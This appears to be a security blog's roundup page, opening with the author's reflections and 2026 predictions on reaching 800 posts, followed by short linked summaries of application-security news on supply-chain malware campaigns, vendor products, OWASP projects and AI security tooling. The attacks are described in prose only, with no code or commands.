Appsec adventures

 After taking a look at these posts https://appsecadventures.blogspot.com/2025/11/800-posts-where-am-i-and-what-are.html https://appsecadventures.blogspot.com/2025/11/800-posts-least-common-subjects.html https://appsecadventures.blogspot.com/2025/11/800-posts-predictions-based-on-rare.html Here are my takes: Obviously, posts are biased based on my interests. So there are a lot of vulnerability management, supply chain security and LLMs and very little about API Security, OWASP Top 10 and scanning tools. This does not mean I am not noticing what's happening. Although LLMs and CoPilots are getting better everyday, the dynamics of programming using LLMs, in the long run, may graduate less skilled developers because the intermediate developers (the newbies nowadays) will rely more on tools to write code. So maybe, we will face an educational problem very soon. People will remain being the weakest link of the chain of security. Attacks are becoming more and more complex and difficult to...

  Theme 2026 Prediction Rationale Mobile Security AI-generated malware and cloned mobile apps will cause a resurgence in mobile-security focus. Attackers shift from supply chain to mobile targets using automated phishing and AI-built malware, reversing 2025’s low interest. Cybersecurity Policy & Government Shifts Governments will introduce major AI safety, disclosure, and cloud-regulation policies. Rising geopolitical tension + legal pressure on CVE disclosure + AI misuse incidents make regulation unavoidable. Corporate Expansion & Hiring Security hiring becomes remote-first with hubs forming in AI-talent regions (India, Israel, Brazil, Eastern Europe). 2025 showed little expansion news due to slowdown; 2026 hiring follows AI talent density, not geography. Cryptographic Governance AI-resistant crypto, dataset signing, and model-weight integrity standards expand in regulated sectors. As AI enters finance/healthcare/gov, integrity and post-quantum c...

Least Common Themes Why They’re Rare (Based on Feed Content) Mobile security Only one post touches iOS/Android app-locking and secure folders, and it's from late 2024, not 2025. It’s mentioned again as “going down” in your own meta-post. Political / policy shifts (e.g., Trump admin cybersecurity posture) Several posts mention policy shifts, but this theme is sparse relative to technical AppSec, supply-chain, and AI content. Appears in 1–2 posts around Oct–Nov. Corporate expansion / hiring news Only one post covers a company opening a new facility (OpenText India). These business-expansion stories are rare in your feed. Cryptographic governance Appears once as a video entry on governance of cryptographic software. No other cryptography-focused discussions show up in 2025 entries. Security champion programs / culture building Only one post highlights security champions (October 2025). Most other posts are about tooling, vulnerabilities, AI, and supply chain...

  I've started in September. I've reached 500 in May, I am reaching 800 in November. It's clearly less posts per month. Of course, I've started to focus on relevance. Popular posts are clearly related to LLMs. NVD is not on the top of the news today, strongly replaced by supply chain attacks. In fact, I think supply chain security was one of the most important subjects this year, as anyone could notice from OWASP Top 10 2025. LLMs are still hot as hell subject. Expanding my sources helped me not to get more news, but to get more tools and more evidence that the most important subjects were the ones I've thought, because most sources were talking about the same things. One thing I'd love to have is some sort of integration with linkedin because I am always reading there. I think linkedin is like a professional blog for many great professionals that I am always following (Madden, Janca, Shostack, Hughes, Hovesepyan, Cipollone, Rexha, Collman, Buchanan and the list...

VulnCheck Canary Intelligence is a new service that uses a global network of intentionally vulnerable systems (“canaries”) to capture live attacker activity—recording real exploitation of CVEs, attacker IPs, payloads, and more. This telemetry is integrated into VulnCheck’s existing intelligence products to help security teams prioritize vulnerabilities based on real-world exploit behavior, give early warning of active campaigns, and provide verified, actionable data rather than theory.  https://www.vulncheck.com/blog/introducing-vulncheck-canary-intelligence

GoDefender is a Go library created by EvilBytecode that helps applications detect and defend against debugging tools, virtualization environments (like VMware or VirtualBox), and code injection techniques. Its modules include anti-debug checks (e.g., detecting if a debugger is attached), virtualization metrics (e.g., identifying sandboxed or emulated environments), and protections against DLL injection.   https://github.com/EvilBytecode/GoDefender

The Shostack + Associates blog announces a revival of the OWASP Threat Modeling Project, with Adam Shostack and other security experts stepping in as project leads. The reboot aims to build a more active community, produce practical and cohesive threat modeling guidance, and define a clear charter. They invite contributors from both inside and outside OWASP to join the effort on Slack and GitHub.  https://shostack.org/blog/owasp-threat-model-reboot/

Bruce Schneier highlights a talk by Kendra Albert at USENIX Security, arguing that modern bug bounty programs legally gag security researchers. These programs often force researchers into nondisclosure agreements that prevent them from publicly sharing vulnerability findings—even when companies don’t fix the bugs. According to Albert, this undermines the original spirit of coordinated vulnerability disclosure, as it restricts transparency and weakens researcher leverage  https://www.schneier.com/blog/archives/2025/11/legal-restrictions-on-vulnerability-disclosure.html

A Veracode report shows that OpenAI’s reasoning-based GPT-5 models produce more secure code than earlier generations, achieving a 70–72% security pass rate across 80 benchmark coding tasks. The tests focused on common vulnerabilities (like SQL injection and XSS) in multiple programming languages. The improved security is likely due to GPT-5’s internal “reasoning” or self-review steps. Despite the progress, Veracode warns that AI-generated code still needs traditional security measures like code reviews, SAST, and runtime protections. https://www.scworld.com/news/openais-gpt-5-generates-more-secure-code-than-past-models-report-finds

A new malware campaign targeting the npm ecosystem uses cloaking techniques to tell apart real users from security researchers. Seven malicious packages created by an actor known as “dino_reborn” redirect users to phishing sites only when the visitor is identified as a likely victim. The payload fingerprinters browser behavior and blocks developer tools, keyboard shortcuts, and context menus. If the visitor seems benign (like a researcher), the page stays blank — helping the campaign avoid analysis. https://cybersecuritynews.com/new-npm-malware-campaign/

According to Sonatype, as software delivery becomes more complex and interconnected, organizations are shifting away from fragmented security tools toward unified platforms. Traditional point tools like SAST, DAST, and SCA create silos, redundant alerts, and increased cost. The trend toward “platformization” helps consolidate visibility, streamline remediation, and reduce risk by bringing together supply chain security, posture management, and developer enablement. Application Security Posture Management (ASPM) plays a key role by prioritizing vulnerabilities based on exploitability and business impact. Sonatype also emphasizes the value of curated open-source catalogs that help developers use trusted components while giving security teams better control. In combining these elements, companies can work faster and more securely without drowning in disconnected data. https://www.sonatype.com/blog/the-shift-toward-unified-platforms-in-application-security

Minimus announced the general availability of “Image Creator,” a feature that lets customers build customized, hardened container images on top of Minimus’s secure platform. These user-built images benefit from Minimus’s exploit intelligence, signed SBOMs, and continuous rebuilds, helping to boost supply chain security and compliance. Minimus also introduced a preview of “Supply Chain Protection,” offering control over open-source package origins, maturity, and usage without changing existing dev workflows. https://www.wboy.com/business/press-releases/cision/20251119NE27753/minimus-revolutionizes-container-security-with-image-creator/

Palo Alto Networks is buying observability platform Chronosphere for $3.35 billion in cash and equity to deepen its AI-era capabilities. The deal will integrate Chronosphere’s always-on, scalable data infrastructure with Palo Alto’s Cortex AgentiX platform, enabling real-time, agent-driven remediation and massive-scale visibility. Chronosphere reported over $160 million in annual recurring revenue and high-growth momentum. The acquisition is expected to close in the second half of Palo Alto’s fiscal 2026. https://www.telecompaper.com/news/palo-alto-to-acquire-containers-observability-platform-chronosphere-for-usd-335-billion--1554697

ActiveState has joined the Trivy Partner Connect program, integrating its VEX advisories, secure language libraries, and container images into Trivy’s scanning. This collaboration brings high-fidelity risk profiles to Trivy users and allows suppression of CVEs that ActiveState deems non-exploitable. The goal is to reduce the volume of noisy, low-value alerts so developers can spend less time investigating vulnerabilities and more time building.  https://www.morningstar.com/news/pr-newswire/20251117sf20225/activestate-joins-trivy-partner-connect-to-cut-cve-noise-and-reduce-alert-fatigue-for-developers

Checkmarx is joining forces with CredShields, a Web3 security firm, to integrate AI-powered smart contract audits, blockchain vulnerability research, and decentralized security tooling into its enterprise application security platform. The collaboration aims to help organizations extend DevSecOps programs into Web3 environments by offering comprehensive coverage for decentralized apps, smart contracts, and wallets. Together, they plan to contribute to global standards like the OWASP Smart Contract Top 10 and make Web3 security part of established corporate pipelines. https://www.prnewswire.com/news-releases/credshields-joins-forces-with-checkmarx-to-bring-smart-contract-security-to-enterprise-appsec-programs-302621714.html

Veracode is reinforcing its leadership in application risk management by introducing a holistic, “always-on” security platform tailored for modern, AI-driven development. With AI widening the threat surface and open-source dependencies growing rapidly, Veracode’s platform offers continuous vulnerability detection, real-time fixes, and supply-chain protection. Its unified dashboard gives teams full visibility into their risks, while automated, AI-powered remediation helps prevent dangerous code from even entering production. https://fox40.com/business/press-releases/ein-presswire/868611147/veracode-sets-new-benchmark-for-application-risk-management-securing-modern-development-in-the-ai-era/

Former Cybersecurity and Infrastructure Security Agency head Jen Easterly argues that many breaches stem from fundamentally poor software rather than purely security failures. With the rise of AI, she believes defenders may finally gain the upper hand by leveraging tools that detect flaws and patch vulnerabilities at scale. If software is engineered securely by design and AI is deployed responsibly, she predicts security breaches could become rare anomalies rather than accepted norms. https://www.theregister.com/2025/10/27/jen_easterly_ai_cybersecurity/

The article argues that effective threat modeling in today’s complex supply chains requires moving beyond surface-level visibility. Rather than just scoping individual tools or vendors, security teams need to model relationships across the full supply-chain ecosystem, including deep tiers. The author recommends using structured approaches (like STRIDE or PASTA) to identify attacker goals, threat actors, and potential attack paths. Crucially, threat modeling should cover build pipelines, policy-as-code, software-component dependencies, and infrastructure — not just the final product. The goal is to shift from reactive security to a proactive, risk-based mindset that anticipates how adversaries might exploit weak links in the chain.  https://www.linkedin.com/pulse/threat-modeling-modern-supply-chain-visibility-beyond-derek-fisher-tliwe/

An ISC² survey of over 1,000 cyber professionals shows that concern about cybersecurity risks in third-party supply chains is widespread. A large portion report past incidents originating from suppliers, yet many lack visibility into their vendors’ broader networks. Key challenges include not knowing who their vendors’ vendors are and needing to “trust but can’t verify” supplier security posture. The top threat types identified are data breaches, malware/ransomware, and vulnerabilities in supplier-provided software. To counter these risks, organizations commonly assess third-party risk on a recurring basis (but some only at onboarding) and require vendor compliance with standards, security audits, multi-factor authentication, and incident-response protocols. Some firms have a formal supply-chain risk program; others rely on contracts or ad hoc methods. https://www.isc2.org/Insights/2025/11/2025-isc2-supply-chain-risk-survey

The article discusses the newly released OWASP Business Logic Abuse Top 10, highlighting how business-logic attacks—especially against APIs—are increasingly common, hard to detect, and often bypass traditional security tools. It uses a real-world example involving Burger King’s API to illustrate several abuse patterns, such as missing validation, privilege escalation, and hidden GraphQL endpoints. The piece outlines the ten categories of logic abuse (e.g., over-limits, race conditions, infinite loops, shadow functions) and argues that meeting compliance standards like PCI DSS 4.0 now requires defenses for these nuanced vulnerabilities. It describes how Wallarm’s platform addresses them by baselining expected behavior, enforcing state transitions, validating tokens, and detecting anomalous workflows.  https://securityboulevard.com/2025/11/owasp-top-10-business-logic-abuse-what-you-need-to-know/

Wiz describes AppSec engineers as a bridge between development and security teams, responsible for threat modeling, secure architecture reviews, code audits, and embedding security throughout the software development lifecycle. They must master both programming (e.g., Python, Go, Java) and cloud-native security (containers, IaC, serverless), while also communicating effectively with developers. The role demands integrating security tooling (SAST, DAST, SCA) into CI/CD, responding to incidents, and training other teams. Wiz emphasizes career progression—from junior analyst to principal engineer or leadership—with competitive salaries and growing demand in modern DevSecOps environments. To support these engineers, Wiz offers its “Code” product: a unified platform that brings together code scanning, dependency analysis, and infrastructure visibility with cloud context to prioritize real risk.   https://www.wiz.io/academy/appsec-engineers

The article outlines five leading tools for securing container images, highlighting the importance of proactively verifying images for CVEs, misconfigurations, and third-party risks before deployment. It emphasizes that modern tools should not only detect vulnerabilities but also help automate hardening. Among the featured tools is Echo , which uses AI to build and maintain CVE-free base images, offering compliance-friendly variants like FIPS and STIG, all while integrating smoothly into CI/CD pipelines.  https://www.developer-tech.com/news/5-best-container-image-security-tools/

Endor Labs now natively supports the OWASP Secure Pipeline Verification Standard (SPVS), enabling teams to apply auditable, automated security controls across the entire software delivery lifecycle. Their platform maps SPVS’s multi-tier framework (Plan, Develop, Integrate, Release, Operate) to its existing capabilities: threat modeling when planning, SAST and secret detection during development, artifact signing and CI pipeline integrity during integration, policy-gated release checks, and runtime monitoring in operation. This integration helps organizations mature their pipeline security in a measurable, standards-aligned way. https://www.endorlabs.com/learn/announcing-native-support-for-owasp-secure-pipeline-verification-standard

Many container images are built with a “kitchen-sink” mindset, including a wide range of unnecessary software that results in hundreds of vulnerabilities per image. Several vendors—like Docker, Chainguard, and CleanStart—are now offering “hardened” base images that strip out nonessential components, reduce the attack surface by up to 95%, run as non-root, and come with SBOMs and signed metadata. These secure images often cut vulnerability counts by more than 97%, and are continuously maintained and patched, making them safer foundations for production workloads.  https://www.darkreading.com/application-security/hardened-containers-eliminate-common-source-vulnerabilities

In discussion #179107 in the GitHub Community, the team behind GitHub Actions outlines upcoming changes (starting December 8, 2025) to the 'pull_request_target' event handling and environment protection rules—aimed at reducing risks when workflows run untrusted code. Community feedback calls for clearer warnings around insecure settings, finer-grained permissions (for example separating "create PRs" from "approve PRs"), scoped secrets to branches/workflows, and stronger audit-style tracing of tokens.  https://github.com/orgs/community/discussions/179107

The article introduces Heisenberg, an open-source toolkit developed by AppOmni, designed to scan pull requests and detect risky or newly published dependencies before they merge. It shifts the role of Software Bills of Materials (SBOMs) from static records into dynamic security controls, enabling both preventive checks during development and rapid incident-response sweeps afterward. Heisenberg operates via CLI and GitHub Action, analyzing health metrics, age of publications, advisories, and post-install scripts to flag suspicious changes without slowing developer velocity.  https://appomni.com/ao-labs/secure-pull-requests-heisenberg-open-source-security

At the OWASP Global AppSec conference, the organization unveiled the AI Vulnerability Scoring System (AIVSS), a new framework designed to measure risks specific to autonomous and agentic AI systems. Building on traditional scoring models, AIVSS incorporates factors like autonomy, non-determinism, tool use, and dynamic identity. It addresses challenges such as transient AI agent identities and new attack vectors including tool misuse, cascading agent failures, context manipulation, and instruction tampering. The framework is in draft form, with version 1.0 expected next year.  scworld.com/resource/owasp-global-appsec-new-ai-vulnerability-scoring-system-unveiled

The article argues that the cybersecurity industry is entering a major consolidation phase, with leaders like Pentera’s recent acquisitions serving as case studies. It shows that startups are increasingly built not to dominate markets but to be absorbed as strategic assets—either for technology, customer bases, or talent. For enterprises, the takeaway is that the winning playbook rests on becoming an integrated platform rather than a stand-alone point solution. The shift also signals harder road for emerging vendors who must articulate a path beyond being acquired.  https://www.forbes.com/sites/alexanderpuutio/2025/11/09/cybersecuritys-consolidation-moment-lessons-from-penteras-acquisitions/

The article explains that burnout in Security Operations Centers can be avoided by reducing alert fatigue, automating repetitive tasks, and improving contextual awareness. It recommends providing analysts with real-time behavioral insights, integrating fresh threat intelligence, and focusing on high-value investigative work rather than constant triage. By prioritizing clarity over alert volume and connecting automation with meaningful context, SOC teams can maintain efficiency, morale, and long-term resilience.  https://thehackernews.com/2025/11/why-soc-burnout-can-be-avoided.html

Bruce Schneier and Nathan E. Sanders argue that despite AI’s association with misinformation, surveillance, and environmental harm, scientists must not abandon optimism. They emphasize that researchers have a responsibility to shape AI toward societal benefit by reforming industry norms, exposing misuse, and applying the technology to strengthen communities. The authors call for scientists to lead with a constructive vision—showing how AI can serve humanity rather than simply warning about its dangers.  https://www.schneier.com/blog/archives/2025/11/scientists-need-a-positive-vision-for-ai.html

At the OWASP Global AppSec conference, cybersecurity expert Adam Shostack criticized traditional risk management models that rely on multiplying likelihood by impact, calling them unreliable and counterproductive. He argued that most organizations lack accurate data to make such calculations meaningful, and that these models often create confusion instead of clarity. Shostack advocated for a shift toward practical threat modeling focused on four key questions: what’s being built, what can go wrong, what can be done about it, and whether the fixes succeeded.  https://www.scworld.com/resource/owasp-global-appsec-risk-management-may-be-a-pointless-waste-of-time

The article explains that Apache Kafka already underpins many AI pipelines by managing real-time data streams essential for training and inference. While organizations often view AI as requiring new infrastructure, most rely on Kafka’s ability to handle continuous data ingestion, event processing, and message delivery at scale. It argues that using outdated or batch data undermines AI performance, and Kafka’s streaming architecture naturally solves this, making it a foundational component of reliable, production-grade AI systems.  https://www.computerweekly.com/blog/Open-Source-Insider/Why-Apache-Kafka-is-the-AI-workflow-you-probably-already-have

Security researchers uncovered a Visual Studio Code extension dubbed “Ransomvibing” that encrypted user files and exfiltrated data while managing to pass marketplace review. The extension contained hard-coded decryption keys and simple Python and Node decryptors, indicating unsophisticated but dangerous behavior. The incident exposes major weaknesses in extension marketplace security and highlights how trusted development environments can be exploited to distribute ransomware-like payloads to unsuspecting developers.  https://www.darkreading.com/application-security/ransomvibing-infests-visual-studio-extension-market

A recent analysis of multiple AI-generated malware samples revealed that, despite growing hype, such threats remain rudimentary and ineffective in real-world conditions. The code lacked persistence, evasion, and lateral movement capabilities, making it easily detectable by standard security tools. Researchers concluded that traditional malware techniques still pose the greater risk, and current AI-assisted attacks do not yet represent a significant leap in sophistication or danger.  arstechnica.com/security/2025/11/ai-generated-malware-poses-little-real-world-threat-contrary-to-hype/

Aqua Security revealed a major leadership change as co-founders Dror Davidoff and Amir Jerbi step back from daily operations to become strategic advisors. Former President and CRO Mike Dube has been appointed CEO, while Nir Makowski, previously SVP of Engineering, becomes Chief Product and Technology Officer. The company, whose cloud-native security platform protects over 40% of the Fortune 100, said the transition positions Aqua for accelerated global expansion and deeper innovation in CNAPP, runtime protection, and vulnerability management.  globenewswire.com/news-release/2025/11/05/3181654/0/en/Aqua-Security-Announces-Leadership-Transition-as-Company-Enters-Its-Next-Phase-of-Growth.html

The study introduces Maven-Hijack, a supply-chain attack that exploits how Apache Maven and the Java Virtual Machine resolve dependencies. By inserting a malicious class with the same fully qualified name as a trusted one earlier in the dependency chain, attackers can override legitimate functionality without altering project code or library names. Researchers demonstrated the attack by hijacking the Corona-Warn-App’s database logic. They assessed countermeasures such as sealed JARs, Java Modules, and Maven’s Enforcer plugin, concluding that Java Modules offer the strongest defense while the Enforcer plugin provides the most practical mitigation.  https://arxiv.org/pdf/2407.18760

Autonomous Application Security Testing (AAST) uses AI and machine learning to continuously detect, analyze, and remediate vulnerabilities with minimal human input. It integrates techniques like SAST, DAST, SCA, and IAST into CI/CD pipelines, automatically adapting to code changes and prioritizing high-impact issues. This approach accelerates release cycles, improves accuracy, and strengthens shift-left security. Despite its advantages, AAST still faces challenges in data quality, tool integration, and operational maturity across complex development environments.  medium.com/@clouddefenseai/autonomous-application-security-testing-what-it-is-how-it-works-db7eff6e6553

The 2025 OWASP Top 10 update marks the biggest overhaul since 2021, keeping Broken Access Control as the leading risk while introducing new categories such as Software Supply Chain Failures and Mishandling of Exceptional Conditions. The revision expands the framework’s focus from individual code vulnerabilities to systemic weaknesses across software ecosystems, emphasizing resilience, configuration management, and secure integration practices as key pillars of modern application security.  https://www.resilientcyber.io/p/the-owasp-top-10-gets-modernized

The v18 update to the MITRE ATT&CK framework replaces brief detection notes with comprehensive Detection Strategies and Analytics that outline adversary behaviors, required telemetry, and platform-specific detection logic. The new version broadens coverage to include Kubernetes, CI/CD environments, cloud identity, and industrial systems. It also formalizes community collaboration through an advisory council, marking a major step toward more actionable, standardized, and behavior-focused threat detection guidance.  https://medium.com/mitre-attack/attack-v18-8f82d839ee9e

Trail of Bits highlights that today’s software ecosystems depend on layers of implicit trust—such as package publishers, build systems, and continuous integration pipelines—that attackers increasingly exploit. Techniques like dependency confusion, typosquatting, and maintainer compromise leverage these blind spots. The article urges developers to replace trust by default with verifiable assurance through signed builds, provenance attestations, capability-based security, and continuous validation of supply-chain integrity across development workflows.  https://blog.trailofbits.com/2025/09/24/supply-chain-attacks-are-exploiting-our-assumptions

Datadog researchers examined recent npm compromises, including the s1ngularity and Shai-Hulud incidents, where attackers targeted package maintainers and injected credential-stealing code through CI workflows. The analysis revealed that weak publishing controls, lack of two-factor authentication, and insufficient dependency monitoring made such breaches possible. Datadog recommends enforcing package age thresholds, auditing dependencies continuously, monitoring metadata for anomalies, and using behavioral detection tools to identify malicious activity before packages reach users.  https://securitylabs.datadoghq.com/articles/learnings-from-recent-npm-compromises

OpenSourceMalware is a collaborative platform where researchers and developers share intelligence about malicious open-source packages and repositories. It focuses on detecting and cataloging compromised libraries across ecosystems like npm and PyPI, enabling the security community to identify, track, and mitigate supply-chain attacks. By centralizing data on open-source malware and promoting transparent collaboration, the project aims to strengthen collective defenses against increasingly sophisticated threats hidden in trusted codebases.  https://opensourcemalware.com/

The OWASP Threat and Safeguard Matrix (TaSM) maps common cybersecurity threats such as phishing, supply-chain compromise, and web abuse against the NIST Cybersecurity Framework functions—Identify, Protect, Detect, Respond, and Recover. This approach helps organizations visualize how each safeguard mitigates specific risks, identify coverage gaps, and prioritize defenses based on real business impact. TaSM provides a practical, defense-in-depth structure for aligning technical and procedural controls with enterprise risk management.  https://owasp.org/www-project-threat-and-safeguard-matrix/

The article argues that many cybersecurity budgets are wasted because spending is driven by compliance checkboxes rather than genuine risk reduction. It suggests leaders shift from buying more tools to measuring the real coverage and effectiveness of existing ones, prune overlapping investments, and apply frameworks like zero-based budgeting and total cost of ownership to focus on high-impact, low-effort initiatives.  https://cisotradecraft.substack.com/p/dont-just-spend-it-how-to-stop-your

Anthropic’s team behind Claude Code described how the tool evolved from an experimental prototype into a new paradigm for software engineering. By eliminating the traditional IDE and integrating AI directly into the terminal, Claude Code lets engineers and models share the same environment, using bash commands, sub-agents, and hooks to automate complex workflows. The developers emphasized “dogfooding,” simplicity, extensibility, and building for power users first. They foresee AI-driven coding shifting from single tasks to continuous, autonomous agents running complex projects across devices and domains.

In a talk at Startup School, Andrew Ng shared lessons from building startups at AI Fund, emphasizing that execution speed is the strongest predictor of success. He urged founders to focus on concrete, buildable ideas, rapid prototyping using AI coding tools, and fast user feedback loops. Ng discussed the rise of agentic AI, the growing importance of understanding AI’s building blocks, and how automation is shifting bottlenecks from engineering to product design. He cautioned against AI hype, defended open source, and stressed ethical, responsible innovation.

OpenAI introduced Aardvark, an autonomous security research agent powered by GPT-5 that scans entire codebases to find and patch vulnerabilities. It performs threat modeling, exploit testing, and automated fix generation while integrating with developer workflows like GitHub. In early trials, Aardvark identified 92% of known vulnerabilities across test repositories and contributed to real CVE discoveries. The system is entering private beta, aiming to make software security proactive and continuous rather than reactive.  https://openai.com/index/introducing-aardvark

A self-propagating malware dubbed “GlassWorm” has infiltrated extensions in the Visual Studio Code and OpenVSX marketplaces, stealing developer credentials, draining crypto wallets, installing SOCKS proxies and remote-access trojans, and using hidden Unicode characters to evade detection. Researchers describe it as one of the most advanced supply-chain attacks to date. They urge companies to treat it as an active incident: audit installed extensions, block untrusted marketplaces, revoke compromised credentials, and monitor developer machines for anomalous connections. https://www.csoonline.com/article/4076718/self-propagating-worm-found-in-marketplaces-for-visual-studio-code-extensions-2.html

Escape’s security team analyzed more than 5,600 applications built using vibe-coding platforms, identifying over 2,000 vulnerabilities, 400 exposed secrets, and 175 cases of personal data exposure. Their approach combined data collection from public sources, subdomain enumeration, automated attack surface mapping, static scans of frontend bundles, and passive dynamic testing. The methodology emphasized conservative verification to ensure findings were high-confidence and accurately reflected the security risks of low-code and vibe-coding ecosystems.  https://escape.tech/blog/methodology-how-we-discovered-vulnerabilities-apps-built-with-vibe-coding/

In his blog, Tony Zhang argues that large language models (LLMs) paired with formal-methods tools can transform code generation into a provably correct process. He suggests the role of AI is shifting from “assistant” to a compiler-like engine—taking developer intent and rigorously translating it into verified software. This could finally bring formal verification into mainstream software engineering by embedding correctness checks directly into the development pipeline.  https://tonyzhangnd.github.io/2025/10/AI-is-a-compiler.html

Old article, still relevant Organizations now manage an average of 70 to 130 cybersecurity tools, with many planning to add even more despite widespread underuse. Only 10 to 20 percent of these tools are fully utilized, leading to redundancy, poor integration, and operational inefficiency. Experts warn that unchecked expansion and fragmented security stacks are turning investments into liabilities, as companies struggle to manage overlapping capabilities and inconsistent visibility across their environments. https://siliconangle.com/2024/08/05/cybersecurity-tool-sprawl-control-going-get-worse

Island is a Chromium-based enterprise browser built to embed security and governance directly into the browsing environment. It allows organizations to control user actions such as copy, download, and screenshot, enforce conditional access based on identity or device posture, and secure SaaS and internal web apps across managed or unmanaged devices. Positioned as a leader in the enterprise browser market, Island aims to make the browser itself the central control point for security and productivity in hybrid work environments.  https://www.island.io/

The CVE program faced near collapse after funding for the National Vulnerability Database was depleted, disrupting access to essential vulnerability data. In response, several organizations proposed alternatives, including the CVE Foundation, ENISA’s EUVD, and a Global Vulnerability Catalog. CISA outlined a plan to reform vulnerability tracking but faces its own budget and staffing constraints, casting doubt on its ability to lead. The conflict’s outcome will determine the future of global vulnerability coordination. https://cyberscoop.com/cve-program-funding-crisis-nvd-cisa-alternatives

The blog by the NVIDIA AI Red Team outlines three major security risks in large-language-model applications: executing model-generated code without sandboxing (leading to remote code execution), insecure permissions in retrieval-augmented-generation (RAG) stores enabling data leaks or prompt injection, and active content rendering (images/links) in LLM outputs causing inadvertent exfiltration. They recommend replacing exec/eval with safe mappings, enforcing per-user permissions on RAG data, and sanitising or disabling dynamic link/image content  https://developer.nvidia.com/blog/practical-llm-security-advice-from-the-nvidia-ai-red-team

A large 4-terabyte SQL Server backup belonging to Ernst & Young (EY) was found publicly accessible on the internet, likely due to a misconfigured cloud storage bucket. The exposed file contained database schemas, API keys, session and authentication tokens, service-account passwords and other sensitive data. Researchers from Neo Security discovered the leak and reported it; EY confirmed the issue was limited to one acquired entity and stated that no client or personal data were impacted.  https://www.linkedin.com/pulse/ernst-young-ey-exposes-4tb-database-online-what-qypre/

Researchers uncovered a major supply-chain attack (codenamed “PhantomRaven”) affecting at least 126 packages in the npm registry. The malware uses remote dependencies hosted on attacker-controlled servers to bypass detection and, via pre-install hooks, harvests developer credentials including GitHub tokens and CI/CD secrets. The campaign has been active since August 2025 and has amassed over 86,000 downloads, underscoring the urgent need for auditing dependencies and rotating exposed credentials.  https://www.linkedin.com/pulse/malware-found-126-npm-packages-stealing-github-tokens-reversinglabs-llohe/